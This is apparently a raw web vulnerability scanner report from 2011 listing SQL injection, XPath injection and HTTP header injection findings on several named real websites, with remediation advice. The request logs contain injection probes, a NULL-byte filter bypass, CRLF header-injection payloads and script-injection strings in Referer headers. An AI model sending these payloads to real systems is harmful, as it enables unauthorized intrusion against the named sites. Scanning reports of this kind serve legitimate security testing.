SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The ltcid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ltcid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltcid=547362597'
Response 1
HTTP/1.1 500 Internal Server Error
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Content-Type: text/html
Content-Length: 369
Date: Wed, 19 Jan 2011 18:01:20 GMT
Server: lighttpd/1.4.19
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
Request 2
GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltcid=547362597''
Response 2
HTTP/1.1 200 OK
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 20-Jan-2011 06:01:21 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 18:01:21 GMT
Server: lighttpd/1.4.19
Content-Length: 45
The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sc.lt?id=' HTTP/1.1
Host: navegg.boo-box.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Content-Type: text/html
Content-Length: 369
Date: Wed, 19 Jan 2011 18:09:52 GMT
Server: lighttpd/1.4.19
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
Request 2
GET /sc.lt?id='' HTTP/1.1
Host: navegg.boo-box.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Connection: close
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: inf=''_0_0_0_0_0_0_0-0-0-0-0; path=/; domain=.boo-box.com; expires=Wed, 19-Jan-2012 12:09:52 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 18:09:52 GMT
Server: lighttpd/1.4.19
Content-Length: 23
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /image/special2.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 16:50:03 GMT
Last-Modified: Wed, 19 Jan 2011 16:50:03 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 5532
Content-Type: text/html
X-Cache: MISS from 12.120.38.41
Age: 35
X-Cache: HIT from 12.120.79.21
Via: 1.1 12.120.38.41:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.21:80 (cache/2.6.2.2.16.ATT)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>AT&a ...[SNIP]... <strong>http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys</strong> ...[SNIP]...
Request 2
GET /image/special2.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 16:49:53 GMT
Last-Modified: Wed, 19 Jan 2011 16:49:53 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 5422
Content-Type: text/html
X-Cache: HIT from 12.120.38.42
Age: 45
X-Cache: HIT from 12.120.79.20
Via: 1.1 12.120.38.42:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.20:80 (cache/2.6.2.2.16.ATT)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>AT&a ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Response 1 (redirected)
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=og0sit55134r4kyfq5mdkl3n; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 25
500 Internal Server Error
Request 2
GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jan 2011 15:48:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=cjknstzb1jhxzoedkedo5kji; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56279
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]...
The FUSEACTION parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the FUSEACTION parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?FUSEACTION=home.299'&pf=y HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
The article_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the article_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=news.detail&article_id=9405'&site_id=286 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
The emp_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emp_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=attorneys.detail&site_id=299&emp_id=377' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=seminars.detail&eventID=5575'&site_id=492 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:51:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
The fuseaction parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fuseaction parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=home.285' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
The site_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the site_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=news.site&site_id=299' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs.
Request
GET /FCWSite'/Img HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<html> <head> <title>This is an unclosed string.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family ...[SNIP]... </b>System.Xml.XPath.XPathException: This is an unclosed string.<br> ...[SNIP]... <pre>
[XPathException: This is an unclosed string.] MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289 MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503 MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs.
Request
GET /FCWSite/Img' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<html> <head> <title>This is an unclosed string.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family ...[SNIP]... </b>System.Xml.XPath.XPathException: This is an unclosed string.<br> ...[SNIP]... <pre>
[XPathException: This is an unclosed string.] MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289 MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503 MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705 MS.Internal.Xml.XPath. ...[SNIP]...
3. HTTP header injection
There are 5 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload acc91%0d%0af14ecc46de1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /files/acc91%0d%0af14ecc46de1 HTTP/1.1
Host: accuserve.homestead.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 19 Jan 2011 15:20:44 GMT
Location: /files/acc91
f14ecc46de1/
3.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /pfadx/csmonitor_cim/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload f761f%0d%0a84ae002f268 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /pfadx/csmonitor_cim/;secure=false;position=1;ac17=1;ac16=1;ac14=1;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;sz=24x24;dcmt=text/html;ord=1295452268743?&f761f%0d%0a84ae002f268=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cim.meebo.com/cim/sandbox.php?lang=en&version=v89_cim_10_3_8&protocol=http%3A&network=csmonitor
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
The value of the secure request parameter is copied into the DCLK_imp response header. The payload af523%0d%0ad8de1a54e2 was submitted in the secure parameter. This caused a response containing an injected HTTP header.
Request
GET /pfadx/csmonitor_cim/;secure=af523%0d%0ad8de1a54e2 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cim.meebo.com/cim/sandbox.php?lang=en&version=v89_cim_10_3_8&protocol=http%3A&network=csmonitor
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
The value of the $ request parameter is copied into the Set-Cookie response header. The payload 99487%0d%0a1735d591256 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=99487%0d%0a1735d591256&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:99487
1735d591256;expires=Thu, 20 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
